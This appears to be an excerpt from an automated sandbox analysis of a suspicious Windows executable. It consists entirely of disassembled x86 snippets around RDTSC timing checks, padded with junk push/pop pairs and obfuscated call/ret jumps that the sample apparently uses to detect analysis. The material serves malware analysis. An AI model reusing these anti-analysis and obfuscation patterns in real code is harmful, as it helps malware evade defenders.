Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 140A4BA second address: 140A518 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push ecx 0x0000000c call 00007FA94CE91928h 0x00000011 pop ecx 0x00000012 mov dword ptr [esp+04h], ecx 0x00000016 add dword ptr [esp+04h], 00000018h 0x0000001e inc ecx 0x0000001f push ecx 0x00000020 ret 0x00000021 pop ecx 0x00000022 ret 0x00000023 mov di, EDA2h 0x00000027 mov bl, dl 0x00000029 push 00000000h 0x0000002b mov ebx, eax 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push ebx 0x00000032 call 00007FA94CE91928h 0x00000037 pop ebx 0x00000038 mov dword ptr [esp+04h], ebx 0x0000003c add dword ptr [esp+04h], 0000001Ah 0x00000044 inc ebx 0x00000045 push ebx 0x00000046 ret 0x00000047 pop ebx 0x00000048 ret 0x00000049 push eax 0x0000004a push eax 0x0000004b push edx 0x0000004c push esi 0x0000004d push ecx 0x0000004e pop ecx 0x0000004f pop esi 0x00000050 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 1408604 second address: 140860A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 1409560 second address: 1409566 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 1409566 second address: 140956A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 140A695 second address: 140A69B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 140A69B second address: 140A6A5 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FA94CE9352Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 140D6C4 second address: 140D717 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FA94CE91926h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jbe 00007FA94CE91946h 0x00000010 jnp 00007FA94CE91938h 0x00000016 js 00007FA94CE91926h 0x0000001c jmp 00007FA94CE9192Ch 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 jo 00007FA94CE91928h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 140E1EB second address: 140E1FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA94CE9352Fh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 140E1FF second address: 140E204 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 140B760 second address: 140B76D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 140B76D second address: 140B771 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 140B771 second address: 140B789 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA94CE93534h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 140B789 second address: 140B78F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 140B78F second address: 140B793 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 14147E5 second address: 14147ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 1414A7C second address: 1414AA5 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FA94CE93526h 0x00000008 jne 00007FA94CE93526h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007FA94CE93532h 0x00000015 pop esi 0x00000016 pushad 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 141CF74 second address: 141CF7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 141D0D2 second address: 141D0E3 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA94CE93526h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [eax] 0x0000000d push ebx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 141D187 second address: 141D1A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FA94CE91936h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 141D1A5 second address: 141D1D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007FA94CE9352Ch 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push ecx 0x00000011 jno 00007FA94CE9352Ch 0x00000017 pop ecx 0x00000018 mov eax, dword ptr [eax] 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d push edx 0x0000001e pop edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 141D1D3 second address: 141D1D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13B5695 second address: 13B56CF instructions: 0x00000000 rdtsc 0x00000002 jne 00007FA94CE9352Eh 0x00000008 jmp 00007FA94CE93536h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jl 00007FA94CE93538h 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FA94CE9352Ah 0x0000001c rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 14216D6 second address: 14216EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jmp 00007FA94CE91930h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 14216EF second address: 1421719 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FA94CE9353Eh 0x00000008 jmp 00007FA94CE93536h 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 ja 00007FA94CE93526h 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 1421845 second address: 1421849 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 1421849 second address: 1421877 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FA94CE93537h 0x0000000c jmp 00007FA94CE9352Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 1421A24 second address: 1421A29 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 1421E2C second address: 1421E32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 1424F44 second address: 1424F4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 1429149 second address: 142915F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007FA94CE9352Bh 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 1429735 second address: 1429744 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jns 00007FA94CE91926h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 1429889 second address: 14298BF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 jnl 00007FA94CE93526h 0x0000000f pop ebx 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jnl 00007FA94CE9353Fh 0x00000019 push eax 0x0000001a push edx 0x0000001b push edx 0x0000001c pop edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 14298BF second address: 14298C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 14298C3 second address: 14298C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 1428ECD second address: 1428ED4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 1428ED4 second address: 1428EE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FA94CE93526h 0x0000000a jnp 00007FA94CE93526h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 1428EE4 second address: 1428EEE instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FA94CE91926h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 1429D18 second address: 1429D26 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FA94CE93526h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 1429D26 second address: 1429D40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA94CE91936h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 1429D40 second address: 1429D6B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA94CE93533h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pushad 0x0000000b je 00007FA94CE9352Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 1429D6B second address: 1429D75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FA94CE91926h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13B71A9 second address: 13B71AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13B71AD second address: 13B71CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007FA94CE9192Ch 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 ja 00007FA94CE91926h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13B71CA second address: 13B71CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13B71CE second address: 13B71E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 je 00007FA94CE91926h 0x0000000f push edx 0x00000010 pop edx 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13B71E0 second address: 13B71E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13B71E8 second address: 13B71EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 142D86C second address: 142D874 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 142D874 second address: 142D878 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13EBF3F second address: 13EBF63 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA94CE93534h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e jc 00007FA94CE93526h 0x00000014 pop edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13EBF63 second address: 13D497A instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA94CE91928h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d add edi, dword ptr [ebp+122D17D7h] 0x00000013 lea eax, dword ptr [ebp+1248ECA1h] 0x00000019 push 00000000h 0x0000001b push ecx 0x0000001c call 00007FA94CE91928h 0x00000021 pop ecx 0x00000022 mov dword ptr [esp+04h], ecx 0x00000026 add dword ptr [esp+04h], 00000014h 0x0000002e inc ecx 0x0000002f push ecx 0x00000030 ret 0x00000031 pop ecx 0x00000032 ret 0x00000033 push edi 0x00000034 call 00007FA94CE91934h 0x00000039 mov cx, dx 0x0000003c pop edi 0x0000003d pop ecx 0x0000003e mov dword ptr [ebp+122D32ACh], edi 0x00000044 push eax 0x00000045 jmp 00007FA94CE9192Fh 0x0000004a mov dword ptr [esp], eax 0x0000004d jmp 00007FA94CE91930h 0x00000052 clc 0x00000053 call dword ptr [ebp+122D31C8h] 0x00000059 push eax 0x0000005a push edx 0x0000005b push eax 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13EC06C second address: 13EC072 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13EC072 second address: 13EC102 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA94CE9192Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c push ecx 0x0000000d xor dword ptr [ebp+122D1B2Bh], edx 0x00000013 pop edx 0x00000014 sub edx, 785C4920h 0x0000001a push dword ptr fs:[00000000h] 0x00000021 add dword ptr [ebp+122D2D98h], edi 0x00000027 mov dword ptr fs:[00000000h], esp 0x0000002e mov edx, 4EC0E8CDh 0x00000033 mov dword ptr [ebp+1248ECF9h], esp 0x00000039 xor edi, dword ptr [ebp+122D1A79h] 0x0000003f cmp dword ptr [ebp+122D27E7h], 00000000h 0x00000046 jne 00007FA94CE919FCh 0x0000004c mov cl, 79h 0x0000004e mov byte ptr [ebp+122D2228h], 00000047h 0x00000055 push 00000000h 0x00000057 push esi 0x00000058 call 00007FA94CE91928h 0x0000005d pop esi 0x0000005e mov dword ptr [esp+04h], esi 0x00000062 add dword ptr [esp+04h], 0000001Bh 0x0000006a inc esi 0x0000006b push esi 0x0000006c ret 0x0000006d pop esi 0x0000006e ret 0x0000006f and cl, 00000060h 0x00000072 mov eax, D49AA7D2h 0x00000077 cmc 0x00000078 nop 0x00000079 pushad 0x0000007a pushad 0x0000007b push esi 0x0000007c pop esi 0x0000007d push eax 0x0000007e push edx 0x0000007f rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13EC3E4 second address: 13EC3F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA94CE9352Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13EC3F2 second address: 13EC400 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA94CE9192Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13EC50C second address: 13EC518 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13EC713 second address: 13EC71A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13ED139 second address: 13ED150 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a jmp 00007FA94CE9352Ch 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13ED150 second address: 13ED174 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FA94CE91928h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b add edi, dword ptr [ebp+122D284Bh] 0x00000011 lea eax, dword ptr [ebp+1248ECE5h] 0x00000017 mov edx, dword ptr [ebp+122D27BFh] 0x0000001d push eax 0x0000001e push esi 0x0000001f push esi 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13ED174 second address: 13ED20E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop esi 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ebp 0x0000000c call 00007FA94CE93528h 0x00000011 pop ebp 0x00000012 mov dword ptr [esp+04h], ebp 0x00000016 add dword ptr [esp+04h], 0000001Ah 0x0000001e inc ebp 0x0000001f push ebp 0x00000020 ret 0x00000021 pop ebp 0x00000022 ret 0x00000023 js 00007FA94CE9352Ch 0x00000029 mov ecx, dword ptr [ebp+122D29CFh] 0x0000002f lea eax, dword ptr [ebp+1248ECA1h] 0x00000035 push 00000000h 0x00000037 push ecx 0x00000038 call 00007FA94CE93528h 0x0000003d pop ecx 0x0000003e mov dword ptr [esp+04h], ecx 0x00000042 add dword ptr [esp+04h], 00000019h 0x0000004a inc ecx 0x0000004b push ecx 0x0000004c ret 0x0000004d pop ecx 0x0000004e ret 0x0000004f cld 0x00000050 nop 0x00000051 jmp 00007FA94CE93536h 0x00000056 push eax 0x00000057 push eax 0x00000058 push edx 0x00000059 pushad 0x0000005a jo 00007FA94CE93526h 0x00000060 jmp 00007FA94CE93539h 0x00000065 popad 0x00000066 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13ED20E second address: 13ED226 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA94CE91934h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13ED226 second address: 13D555C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push esi 0x0000000c call 00007FA94CE93528h 0x00000011 pop esi 0x00000012 mov dword ptr [esp+04h], esi 0x00000016 add dword ptr [esp+04h], 00000014h 0x0000001e inc esi 0x0000001f push esi 0x00000020 ret 0x00000021 pop esi 0x00000022 ret 0x00000023 call 00007FA94CE93534h 0x00000028 mov ecx, dword ptr [ebp+122D28FBh] 0x0000002e pop edx 0x0000002f call dword ptr [ebp+1245C6F4h] 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 jl 00007FA94CE93526h 0x0000003f rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13D555C second address: 13D5560 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13D5560 second address: 13D5566 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13A442A second address: 13A443D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA94CE9192Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13A443D second address: 13A4453 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007FA94CE93530h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 142DFBC second address: 142DFC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 142E15E second address: 142E17F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FA94CE93539h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 142E478 second address: 142E47C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 142E47C second address: 142E486 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 142E5D4 second address: 142E5D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 142E5D9 second address: 142E5E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 142E5E0 second address: 142E604 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FA94CE91926h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FA94CE91935h 0x00000012 push edi 0x00000013 pop edi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 1437274 second address: 1437278 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 1437278 second address: 1437287 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA94CE91926h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 1437287 second address: 14372B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push edx 0x0000000a pop edx 0x0000000b jmp 00007FA94CE93536h 0x00000010 jmp 00007FA94CE9352Fh 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 14372B8 second address: 14372C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jno 00007FA94CE91926h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 1437988 second address: 143799E instructions: 0x00000000 rdtsc 0x00000002 jp 00007FA94CE93526h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f jg 00007FA94CE93526h 0x00000015 pop eax 0x00000016 rdtsc
